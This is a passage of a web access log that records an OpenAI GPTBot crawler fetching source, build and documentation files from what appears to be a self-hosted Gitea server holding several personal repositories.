"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:14:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20372] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:14:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:14:38:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:14:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fupdateRecord.md" [Client 74.7.227.38] [Length 25684] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:14:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 32566] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:14:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30955] [Gzip 16.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:14:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 161916] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:14:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 987902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:14:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 11668] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:14:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 25961] [Gzip 14.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:14:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:14:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 96914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:14:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43157] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 46093] [Gzip 8.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" -[17/Feb/2026:14:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" -[17/Feb/2026:14:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23046] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13018] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:14:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py" [Client 74.7.227.38] [Length 23739] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:14:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:14:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10481] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:14:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10873] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:14:38:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/instrument.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:14:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12932] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:14:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:14:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11645] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12876] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:14:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:14:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11876] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21045] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11067] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 